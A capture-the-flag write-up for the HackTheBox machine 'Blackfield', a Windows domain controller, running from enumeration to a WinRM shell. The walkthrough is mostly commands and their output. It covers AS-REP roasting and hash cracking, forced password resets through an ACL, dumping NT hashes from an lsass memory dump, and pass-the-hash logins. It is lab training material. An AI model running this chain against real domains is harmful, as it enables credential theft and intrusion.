Blackfield

AD box on HTB.

Enumeration:

Port Scanning:

We will start with nmap scanning:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.229.17           
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 15:21 +03
Nmap scan report for 10.129.229.17                                                                                                                                         
Host is up, received echo-reply ttl 127 (0.13s latency).                             
Scanned at 2025-09-10 15:21:52 +03 for 148s                                          
Not shown: 65527 filtered tcp ports (no-response)                                    
PORT     STATE SERVICE       REASON          VERSION                                                                                                                       
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus                                                                                                               
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 19:22:36Z)                                                                
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC                                                                                                         
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127                                                                                                                               
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0     
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)                           
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                       
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                
|_http-title: Not Found                                                              
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

This time we have less ports, but still those open ports are enough to know that this is a domain controller.

We can identify the FQDN (Fully qualified domain name) from that nmap scan, but we can also use for example netexec to view it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                             
└─$ netexec smb 10.129.229.17                                                               
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)

So I will add the hostname and domain and their corresponding IP address to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ cat /etc/hosts                                                                   
127.0.0.1       localhost                                                            
127.0.1.1       kali                                                                                                                                                       
<snipped>

10.129.229.17 DC01.BLACKFIELD.local BLACKFIELD.local DC01

We do not have any interesting shares permissions with guest user:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ netexec smb dc01.blackfield.local -u 'guest' -p '' --shares                                                                                                            
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)        
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\guest:                                                                                            
SMB         10.129.229.17   445    DC01             [*] Enumerated shares                                                                                                  
SMB         10.129.229.17   445    DC01             Share           Permissions     Remark                                                                                 
SMB         10.129.229.17   445    DC01             -----           -----------     ------                                                                                 
SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin                                                                           
SMB         10.129.229.17   445    DC01             C$                              Default share                                                                          
SMB         10.129.229.17   445    DC01             forensic                        Forensic / Audit share.                                                                
SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC                                                                             
SMB         10.129.229.17   445    DC01             NETLOGON                        Logon server share                                                                     
SMB         10.129.229.17   445    DC01             profiles$       READ                                                                                                   
SMB         10.129.229.17   445    DC01             SYSVOL                          Logon server share

But since we have read permissions over IPC$ share which is enough to perform some RPC queries/enumeration, including users on that system.

AS-REP Roasting:

We can use multiple tools such as netexec or impacket-lookupsid to get the users:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]             
└─$ impacket-lookupsid blackfield.local/guest@10.129.229.17 -no-pass                 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies           
                                                                                     
[*] Brute forcing SIDs at 10.129.229.17                                              
[*] StringBinding ncacn_np:10.129.229.17[\pipe\lsarpc]                               
[*] Domain SID is: S-1-5-21-4194615774-2175524697-3563712290
498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BLACKFIELD\Administrator (SidTypeUser)    
501: BLACKFIELD\Guest (SidTypeUser)                                                  
502: BLACKFIELD\krbtgt (SidTypeUser)                                                 
512: BLACKFIELD\Domain Admins (SidTypeGroup)   
513: BLACKFIELD\Domain Users (SidTypeGroup)     
514: BLACKFIELD\Domain Guests (SidTypeGroup)              
515: BLACKFIELD\Domain Computers (SidTypeGroup)            
516: BLACKFIELD\Domain Controllers (SidTypeGroup)          
517: BLACKFIELD\Cert Publishers (SidTypeAlias) 
518: BLACKFIELD\Schema Admins (SidTypeGroup)                                         
519: BLACKFIELD\Enterprise Admins (SidTypeGroup)    
520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)           
522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)          
525: BLACKFIELD\Protected Users (SidTypeGroup)                                       
526: BLACKFIELD\Key Admins (SidTypeGroup)                                            
527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)                                   
571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)               
572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
1000: BLACKFIELD\DC01$ (SidTypeUser)                                                 
1101: BLACKFIELD\DnsAdmins (SidTypeAlias)                                            
1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup) 
1103: BLACKFIELD\audit2020 (SidTypeUser)                                             
1104: BLACKFIELD\support (SidTypeUser)                                               
1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
<snipped>
1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)           
1413: BLACKFIELD\svc_backup (SidTypeUser)                                            
1414: BLACKFIELD\lydericlefebvre (SidTypeUser)                       
1415: BLACKFIELD\PC01$ (SidTypeUser)                                                 
1416: BLACKFIELD\PC02$ (SidTypeUser)                                                 
1417: BLACKFIELD\PC03$ (SidTypeUser)                                                 
1418: BLACKFIELD\PC04$ (SidTypeUser)                                                 
1419: BLACKFIELD\PC05$ (SidTypeUser)                                                 
1420: BLACKFIELD\PC06$ (SidTypeUser)                                                 
1421: BLACKFIELD\PC07$ (SidTypeUser)                                                 
1422: BLACKFIELD\PC08$ (SidTypeUser)                                                 
1423: BLACKFIELD\PC09$ (SidTypeUser)                                                 
1424: BLACKFIELD\PC10$ (SidTypeUser)                                                 
1425: BLACKFIELD\PC11$ (SidTypeUser)                                                 
1426: BLACKFIELD\PC12$ (SidTypeUser)                                                 
1427: BLACKFIELD\PC13$ (SidTypeUser)                                                 
1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)                                              
1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)                                             
1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)                                         
1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ netexec smb dc01.blackfield.local -u 'guest' -p '' --rid-brute                                                                                                         
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)        
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\guest:                                                                                            
SMB         10.129.229.17   445    DC01             498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                 
SMB         10.129.229.17   445    DC01             500: BLACKFIELD\Administrator (SidTypeUser)                                                                            
SMB         10.129.229.17   445    DC01             501: BLACKFIELD\Guest (SidTypeUser)                                                                                    
SMB         10.129.229.17   445    DC01             502: BLACKFIELD\krbtgt (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             512: BLACKFIELD\Domain Admins (SidTypeGroup)                                                                           
SMB         10.129.229.17   445    DC01             513: BLACKFIELD\Domain Users (SidTypeGroup)                                                                            
SMB         10.129.229.17   445    DC01             514: BLACKFIELD\Domain Guests (SidTypeGroup)                                                                           
SMB         10.129.229.17   445    DC01             515: BLACKFIELD\Domain Computers (SidTypeGroup)                                                                        
SMB         10.129.229.17   445    DC01             516: BLACKFIELD\Domain Controllers (SidTypeGroup)                                                                      
SMB         10.129.229.17   445    DC01             517: BLACKFIELD\Cert Publishers (SidTypeAlias)                                                                         
SMB         10.129.229.17   445    DC01             518: BLACKFIELD\Schema Admins (SidTypeGroup)                                                                           
SMB         10.129.229.17   445    DC01             519: BLACKFIELD\Enterprise Admins (SidTypeGroup)                                                                       
SMB         10.129.229.17   445    DC01             520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)                                                             
SMB         10.129.229.17   445    DC01             521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)                                                            
SMB         10.129.229.17   445    DC01             522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)                                                            
SMB         10.129.229.17   445    DC01             525: BLACKFIELD\Protected Users (SidTypeGroup)                                                                         
SMB         10.129.229.17   445    DC01             526: BLACKFIELD\Key Admins (SidTypeGroup)                                                                              
SMB         10.129.229.17   445    DC01             527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)                                                                   
SMB         10.129.229.17   445    DC01             553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)                                                                     
SMB         10.129.229.17   445    DC01             571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)                                                 
SMB         10.129.229.17   445    DC01             572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)                                                  
SMB         10.129.229.17   445    DC01             1000: BLACKFIELD\DC01$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1101: BLACKFIELD\DnsAdmins (SidTypeAlias)                                                                              
SMB         10.129.229.17   445    DC01             1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)                                                                         
SMB         10.129.229.17   445    DC01             1103: BLACKFIELD\audit2020 (SidTypeUser)                                                                               
SMB         10.129.229.17   445    DC01             1104: BLACKFIELD\support (SidTypeUser)                                                                                 
SMB         10.129.229.17   445    DC01             1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
<snipped>
SMB         10.129.229.17   445    DC01             1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)                                                                        
SMB         10.129.229.17   445    DC01             1413: BLACKFIELD\svc_backup (SidTypeUser)                                                                              
SMB         10.129.229.17   445    DC01             1414: BLACKFIELD\lydericlefebvre (SidTypeUser)                                                                         
SMB         10.129.229.17   445    DC01             1415: BLACKFIELD\PC01$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1416: BLACKFIELD\PC02$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1417: BLACKFIELD\PC03$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1418: BLACKFIELD\PC04$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1419: BLACKFIELD\PC05$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1420: BLACKFIELD\PC06$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1421: BLACKFIELD\PC07$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1422: BLACKFIELD\PC08$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1423: BLACKFIELD\PC09$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1424: BLACKFIELD\PC10$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1425: BLACKFIELD\PC11$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1426: BLACKFIELD\PC12$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1427: BLACKFIELD\PC13$ (SidTypeUser)                                                                                   
SMB         10.129.229.17   445    DC01             1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)                                                                                
SMB         10.129.229.17   445    DC01             1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)                                                                               
SMB         10.129.229.17   445    DC01             1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)                                                                           
SMB         10.129.229.17   445    DC01             1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)

Every domain has its own SID, so how this works, it obtains the SID of the target domain, and then incrementally try to reverse lookup (SID + RID), for example the administrator has the RID of 500, it checks if S-1-5-21-4194615774-2175524697-3563712290-500 exist, and then resolve that SID to an account user.

We can save this result and using some tools to extract the users only:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                             
└─$ cat temp.txt | grep SidTypeUser | awk '{print $2}' | cut -d '\' -f 2 > users.txt

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                             
└─$ cat users.txt                                                                                                                                                          
Administrator   
Guest           
krbtgt          
DC01$           
audit2020       
support         
BLACKFIELD764430
etc...

I will try to check if one of those users has no preauth required enabled using impacket-GetNPUsers, and get his asrep ticket:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                15:44:48 [315/1992]
└─$ impacket-GetNPUsers blackfield.local/ -usersfile users.txt                                                                                                             
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                                                                                                           
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                            
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                                    
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)                                                                                   
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                                    
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                                
$krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b164714e0e6ce50ca664ddd8d$229f07301b37e2c13579dbf33660737f3613f60b0b9bf57625bf4a6f3e9d3e830b1e06a882603f0a5cf24529f410f92f79b
78f7e68ebdcd6366fa0590be12dee033ff12b15191d2f025638f527a01a8b95163c444b40249e8e4c301629c76651a05a6067a030780e4c728887a385420564fceb2dab344c3cc6d748410fca0954224df3cdd35880
9b67f2ae596f39c4042a29515d1f4da4c32cfe1e2994a293564ab4f69b75b04005f6714f62d8c159d3bbe02055985c706d5bb884660e19cf9e5b15941e53395cbc1d1124cb09da4f7c5726f13890cdc25de3617bdb3
a800129b295a587caa17655cb8c81db782d6b60c5******                                                                                                                            
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>

We have one of the users is as-rep roastable, lets grab his hash and attempt to crack it with hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ hashcat support.hash /usr/share/wordlists/rockyou.txt                                                                                                                  
hashcat (v6.2.6) starting in autodetect mode

<snipped>

$krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b164714e0e6ce50ca664ddd8d$229f07301b37e2c13579dbf33660737f3613f60b0b9bf57625bf4a6f3e9d3e830b1e06a882603f0a5cf24529f410f92f79b
78f7e68ebdcd6366fa0590be12dee033ff12b15191d2f025638f527a01a8b95163c444b40249e8e4c301629c76651a05a6067a030780e4c728887a385420564fceb2dab344c3cc6d748410fca0954224df3cdd35880
9b67f2ae596f39c4042a29515d1f4da4c32cfe1e2994a293564ab4f69b75b04005f6714f62d8c159d3bbe02055985c706d5bb884660e19cf9e5b15941e53395cbc1d1124cb09da4f7c5726f13890cdc25de3617bdb3
a800129b295a587caa17655cb8c81db782d6b60c5******:#00^Black******                                                                                                            
                                                                                                                                                                           
Session..........: hashcat                                                                                                                                                 
Status...........: Cracked                                                                                                                                                 
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)                                                                                                                    
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b1647...******                                                                                            
Time.Started.....: Wed Sep 10 15:45:20 2025 (10 secs)                                                                                                                      
Time.Estimated...: Wed Sep 10 15:45:30 2025 (0 secs)                                                                                                                       
Kernel.Feature...: Pure Kernel                                                                                                                                             
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)                                                                                                                 
Guess.Queue......: 1/1 (100.00%)                                                                                                                                           
Speed.#1.........:  1538.1 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:8                                                                                                   
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)                                                                                              
Progress.........: 14337024/14344385 (99.95%)                                                                                                                              
Rejected.........: 0/14337024 (0.00%)                                                                                                                                      
Restore.Point....: 14333952/14344385 (99.93%)                                                                                                                              
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1                                                                                                                      
Candidate.Engine.: Device Generator                                                                                                                                        
Candidates.#1....: #1crapper -> "$&(!=                                                                                                                                     
Hardware.Mon.#1..: Util: 33%

<snipped>

BloodHound:

Now the time for bloodhound:

Lets ingest bloodhound data with netexec, and then upload it to bloodhound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ netexec ldap dc01.blackfield.local -u support -p '#00^BlackKnight' --bloodhound -c all --dns-server 10.129.229.17                                                      
LDAP        10.129.229.17   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)                                         
LDAP        10.129.229.17   389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight                                                                           
LDAP        10.129.229.17   389    DC01             Resolved collection methods: dcom, objectprops, acl, session, group, localadmin, container, psremote, rdp, trusts      
LDAP        10.129.229.17   389    DC01             Done in 00M 39S                                                                                                        
LDAP        10.129.229.17   389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/bloodhound]                                                                                                            
└─$ unzip DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip                                                                                                              
Archive:  DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip                                                                                                              
 extracting: DC01_10.129.229.17_2025-09-10_154846_users.json                                                                                                                extracting: DC01_10.129.229.17_2025-09-10_154846_gpos.json                                                                                                                
 extracting: DC01_10.129.229.17_2025-09-10_154846_groups.json  
 extracting: DC01_10.129.229.17_2025-09-10_154846_ous.json  
 extracting: DC01_10.129.229.17_2025-09-10_154846_computers.json                                                                                                           
 extracting: DC01_10.129.229.17_2025-09-10_154846_domains.json                                                                                                             
 extracting: DC01_10.129.229.17_2025-09-10_154846_containers.json

Start bloodhound:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/bloodhound]                                                                                                            
└─$ sudo bloodhound                                                                                                                                                        
[sudo] password for kali:                                                                                                                                                  
                                                                                                                                                                           
 Starting neo4j                                                                                                                                                            
Neo4j is not running.                                                                                                                                                      
Directories in use:                                                                                                                                                        
home:         /usr/share/neo4j                                                                                                                                             
config:       /usr/share/neo4j/conf                                                                                                                                        
logs:         /etc/neo4j/logs                                                                                                                                              
plugins:      /usr/share/neo4j/plugins                                                                                                                                     
import:       /usr/share/neo4j/import                                                                                                                                      
data:         /etc/neo4j/data                                                                                                                                              
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:20694). It is available at http://localhost:7474
There may be a short delay until the server is ready.
................................................
 Bloodhound will start

 IMPORTANT: It will take time, please wait...
 
<snipped>

 opening http://127.0.0.1:8080

Abuse ACL:

We will find the support user that we have owned, has force change password acl over audit2020 user, I will use bloodyAD this time to change this user's password:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ bloodyAD --host 10.129.229.17 -d blackfield.local -u support -p '#00^BlackKnight' set password 'audit2020' 'Caesar3#'                                                  
[+] Password changed successfully!

See if the password has been changed correctly:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ nxc smb dc01.blackfield.local -u audit2020 -p 'Caesar3#'                                                                                                               
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)        
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\audit2020:Caesar3#

Now if we enumerated the shares again:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ nxc smb dc01.blackfield.local -u audit2020 -p 'Caesar3#' --shares                                                                                                      
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)        
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\audit2020:Caesar3#                                                                                
SMB         10.129.229.17   445    DC01             [*] Enumerated shares                                                                                                  
SMB         10.129.229.17   445    DC01             Share           Permissions     Remark                                                                                 
SMB         10.129.229.17   445    DC01             -----           -----------     ------                                                                                 
SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin                                                                           
SMB         10.129.229.17   445    DC01             C$                              Default share                                                                          
SMB         10.129.229.17   445    DC01             forensic        READ            Forensic / Audit share.                                                                
SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC                                                                             
SMB         10.129.229.17   445    DC01             NETLOGON        READ            Logon server share                                                                     
SMB         10.129.229.17   445    DC01             profiles$       READ            
SMB         10.129.229.17   445    DC01             SYSVOL          READ            Logon server share

We have read permissions over an interesting share that we have not before (forensics), lets see what it has:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-smbclient blackfield.local/audit2020:'Caesar3#'@10.129.229.17               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
ADMIN$
C$
forensic
IPC$
NETLOGON
profiles$
SYSVOL
# use forensic
# ls
drw-rw-rw-          0  Sun Feb 23 18:10:16 2020 .
drw-rw-rw-          0  Sun Feb 23 18:10:16 2020 ..
drw-rw-rw-          0  Sun Feb 23 21:14:37 2020 commands_output
drw-rw-rw-          0  Thu May 28 23:29:24 2020 memory_analysis
drw-rw-rw-          0  Sat Feb 29 01:30:34 2020 tools
# cd commands_output
# ls
drw-rw-rw-          0  Sun Feb 23 21:14:37 2020 .
drw-rw-rw-          0  Sun Feb 23 21:14:37 2020 ..
-rw-rw-rw-        528  Sun Feb 23 21:12:54 2020 domain_admins.txt
-rw-rw-rw-        962  Sun Feb 23 21:12:54 2020 domain_groups.txt
-rw-rw-rw-      16454  Sat Feb 29 01:32:17 2020 domain_users.txt
-rw-rw-rw-     518202  Sun Feb 23 21:12:54 2020 firewall_rules.txt
-rw-rw-rw-       1782  Sun Feb 23 21:12:54 2020 ipconfig.txt
-rw-rw-rw-       3842  Sun Feb 23 21:12:54 2020 netstat.txt
-rw-rw-rw-       3976  Sun Feb 23 21:12:54 2020 route.txt
-rw-rw-rw-       4550  Sun Feb 23 21:12:54 2020 systeminfo.txt
-rw-rw-rw-       9990  Sun Feb 23 21:12:54 2020 tasklist.txt
# mget *
[*] Downloading domain_admins.txt
[*] Downloading domain_groups.txt
[*] Downloading domain_users.txt
[*] Downloading firewall_rules.txt
[*] Downloading ipconfig.txt
[*] Downloading netstat.txt
[*] Downloading route.txt
[*] Downloading systeminfo.txt
[*] Downloading tasklist.txt
# cd ..
# cd tools
# ls
drw-rw-rw-          0  Sat Feb 29 01:30:34 2020 .
drw-rw-rw-          0  Sat Feb 29 01:30:34 2020 ..
drw-rw-rw-          0  Sat Feb 29 01:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw-          0  Sat Feb 29 01:30:35 2020 sysinternals
drw-rw-rw-          0  Sat Feb 29 01:30:35 2020 volatility
# cd ..
# cd memory_analysis
# ls
drw-rw-rw-          0  Thu May 28 23:29:24 2020 .
drw-rw-rw-          0  Thu May 28 23:29:24 2020 ..
-rw-rw-rw-   37876530  Thu May 28 23:29:24 2020 conhost.zip
-rw-rw-rw-   24962333  Thu May 28 23:29:24 2020 ctfmon.zip
-rw-rw-rw-   23993305  Thu May 28 23:29:24 2020 dfsrs.zip
-rw-rw-rw-   18366396  Thu May 28 23:29:24 2020 dllhost.zip
-rw-rw-rw-    8810157  Thu May 28 23:29:24 2020 ismserv.zip
-rw-rw-rw-   41936098  Thu May 28 23:29:24 2020 lsass.zip
-rw-rw-rw-   64288607  Thu May 28 23:29:24 2020 mmc.zip
-rw-rw-rw-   13332174  Thu May 28 23:29:24 2020 RuntimeBroker.zip
-rw-rw-rw-  131983313  Thu May 28 23:29:24 2020 ServerManager.zip
-rw-rw-rw-   33141744  Thu May 28 23:29:24 2020 sihost.zip
-rw-rw-rw-   33756344  Thu May 28 23:29:24 2020 smartscreen.zip
-rw-rw-rw-   14408833  Thu May 28 23:29:24 2020 svchost.zip
-rw-rw-rw-   34631412  Thu May 28 23:29:24 2020 taskhostw.zip
-rw-rw-rw-   14255089  Thu May 28 23:29:24 2020 winlogon.zip
-rw-rw-rw-    4067425  Thu May 28 23:29:24 2020 wlms.zip
-rw-rw-rw-   18303252  Thu May 28 23:29:24 2020 WmiPrvSE.zip
# get lsass.zip
# exit

It seems some forensics investigation happened, because we can see some txt files have not useful information to us, and the tools directory has some memory forensics tools, but the third directory, we will explore an interesting zip file that is the lsass process dump which normally has some secrets we can dump and use for lateral movement for example.

Lateral Movement to svc_backup:

We can use mimikatz on our own desktop or any variations of mimiktaz, I will use pypykatz to analyze the dump the secrets contained inside lsass.dmp:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ pypykatz lsa minidump lsass.DMP 
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
                
<snipped>

I used lsa module, and specified minidump argument to tell pypykatz to use lsass.dmp dump.

Here we have svc_backup nt hash, and DC01$ nt hashes but non of them worked, also non of them was the machine itself nt hash.

We can confirm if svc_backup nt hash is still valid using netexec:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]                                                                                                              
└─$ nxc smb dc01.blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d --sam                                                                                  
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)        
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d

Also bloodhound shows that svc_backup is member of the Remote Management Users, so we can WinRM to the target machine:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]                                                                                                              
└─$ evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d                                                                                          
                                                                                                                                                                           
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                           
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                      
                                                                                                                                                                           
Info: Establishing connection to remote endpoint                                                                                                                           
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

Also:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all                                                                                                                 
                                                                                                                                                                           
USER INFORMATION                                                                                                                                                           
----------------                                                                                                                                                           
                                                                                                                                                                           
User Name             SID                                                                                                                                                  
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
